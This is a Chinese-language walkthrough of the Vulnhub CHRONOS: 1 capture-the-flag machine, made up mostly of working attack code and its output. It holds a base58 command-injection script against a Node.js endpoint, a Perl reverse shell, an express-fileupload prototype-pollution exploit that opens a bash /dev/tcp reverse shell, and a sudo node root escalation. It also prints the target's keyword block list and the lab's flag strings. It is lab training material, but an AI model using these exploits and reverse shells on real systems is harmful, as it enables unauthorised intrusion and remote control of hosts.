Vulnhub系列--CHRONOS: 1

本次渗透测试我将使用cs来辅助进行渗透：

打点

主机存活发现：

┌──(kali㉿kali)-[~]
└─$ nmap -sP 192.168.56.1/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-31 09:35 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.101
Host is up (0.00039s latency).
Nmap scan report for 192.168.56.102
Host is up (0.013s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 6.86 seconds

目标主机IP：192.168.56.102

对目标进行扫描：

┌──(kali㉿kali)-[~]
└─$ nmap -A 192.168.56.102
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-31 09:42 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.102
Host is up (0.0031s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e4:f2:83:a4:38:89:8d:86:a5:e1:31:76:eb:9d:5f:ea (RSA)
|   256 41:5a:21:c4:58:f2:2b:e4:8a:2f:31:73:ce:fd:37:ad (ECDSA)
|_  256 9b:34:28:c2:b9:33:4b:37:d5:01:30:6f:87:c4:6b:23 (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.29 (Ubuntu)
8000/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-open-proxy: Proxy might be redirecting requests
|_http-cors: HEAD GET POST PUT DELETE PATCH
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.90 seconds

访问目标：

发现存在一个域名：chronos.local

将其添加到hosts文件解析，可以访问这个目标：

发现是一个输入字符串进行解析，字符串是**base58 **编码的，解析后得到：

4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL

猜测可能存在代码执行，编写脚本：

import base58
import requests


def attack(command):
    url = b'http://chronos.local:8000/date?format=%s' % base58.b58encode(command)
    print(url)
    payload={}
    headers = {
      'User-Agent': 'Chronos',
      'Accept': '*/*',
      'Accept-Language': 'en-US,en;q=0.5',
      'Origin': 'http://chronos.local',
      'Connection': 'keep-alive',
      'Referer': 'http://chronos.local/',
      'If-None-Match': 'W/"2c-Nrqrq9OAfQyOcS4aQZ8VPoBAXks"'
    }

    response = requests.request("GET", url, headers=headers, data=payload)

    return response.text


if __name__ == '__main__':
   attack('&& ls')

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-HEPzObbs-1648738788444)(https://s2.loli.net/2022/03/31/bgoscyKS4MJRV1h.png)]

查看源代码：

// created by alienum for Penetration Testing
const express = require('express');
const { exec } = require("child_process");
const bs58 = require('bs58');
const app = express();

const port = 8000;

const cors = require('cors');


app.use(cors());

app.get('/', (req,res) =>{
  
    res.sendFile("/var/www/html/index.html");
});

app.get('/date', (req, res) => {

    var agent = req.headers['user-agent'];
    var cmd = 'date ';
    const format = req.query.format;
    const bytes = bs58.decode(format);
    var decoded = bytes.toString();
    var concat = cmd.concat(decoded);
    if (agent === 'Chronos') {
        if (concat.includes('id') || concat.includes('whoami') || concat.includes('python') || concat.includes('nc') || concat.includes('bash') || concat.includes('php') || concat.includes('which') || concat.includes('socat')) {

            res.send("Something went wrong");
        }
        exec(concat, (error, stdout, stderr) => {
            if (error) {
                console.log(`error: ${error.message}`);
                return;
            }
            if (stderr) {
                console.log(`stderr: ${stderr}`);
                return;
            }
            res.send(stdout);
        });
    }
    else{

        res.send("Permission Denied");
    }
})

app.listen(port,() => {

    console.log(`Server running at ${port}`);

})

过滤了一些字符，不能用简单的bash反弹shell，查看程序安装了什么程序：

存在一个perl，可以使用其进行反弹shell:

attack('&&perl -e \'use Socket;$i="192.168.56.101";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'')

kali开启监听，成功反弹，但是读取user.txt权限不够

切换用户

查看网络连接：

本地开放了个8080 端口，访问发现存在一个服务，发现存在一个本地的服务，存在一个第二个版本，在**/opt/chronos-v2/backend 目录下，**查看package.json：

{
  "name": "some-website",
  "version": "1.0.0",
  "description": "",
  "main": "server.js",
  "scripts": {
    "start": "node server.js"
  },
  "author": "",
  "license": "ISC",
  "dependencies": {
    "ejs": "^3.1.5",
    "express": "^4.17.1",
    "express-fileupload": "^1.1.7-alpha.3"
  }
}

server.js

const express = require('express');
const fileupload = require("express-fileupload");
const http = require('http')

const app = express();

app.use(fileupload({ parseNested: true }));

app.set('view engine', 'ejs');
app.set('views', "/opt/chronos-v2/frontend/pages");

app.get('/', (req, res) => {
   res.render('index')
});

const server = http.Server(app);
const addr = "127.0.0.1"
const port = 8080;
server.listen(port, addr, () => {
   console.log('Server listening on ' + addr + ' port ' + port);
});

这个express-fileupload存在原型链污染，可以直接使用exp:

exp.py

import requests

### commands to run on victim machine
cmd = 'bash -c "bash -i &> /dev/tcp/192.168.56.101/8020 0>&1"'

print("Starting Attack...")
### pollute
requests.post('http://127.0.0.1:8080', files = {'__proto__.outputFunctionName': (
    None, f"x;console.log(1);process.mainModule.require('child_process').exec('{cmd}');x")})

### execute command
requests.get('http://127.0.0.1:8080')
print("Finished!")

监听8020端口，成功getshell：

user.txt

byBjaHJvbm9zIHBlcm5hZWkgZmlsZSBtb3UK

提权

可以看到node可以以root权限执行，并且不需要密码，可以利用node 运行脚本提权：

sudo node -e 'child_process.spawn("/bin/sh", {stdio: [0, 1, 2]})'

root.txt:

YXBvcHNlIHNpb3BpIG1hemV1b3VtZSBvbmVpcmEK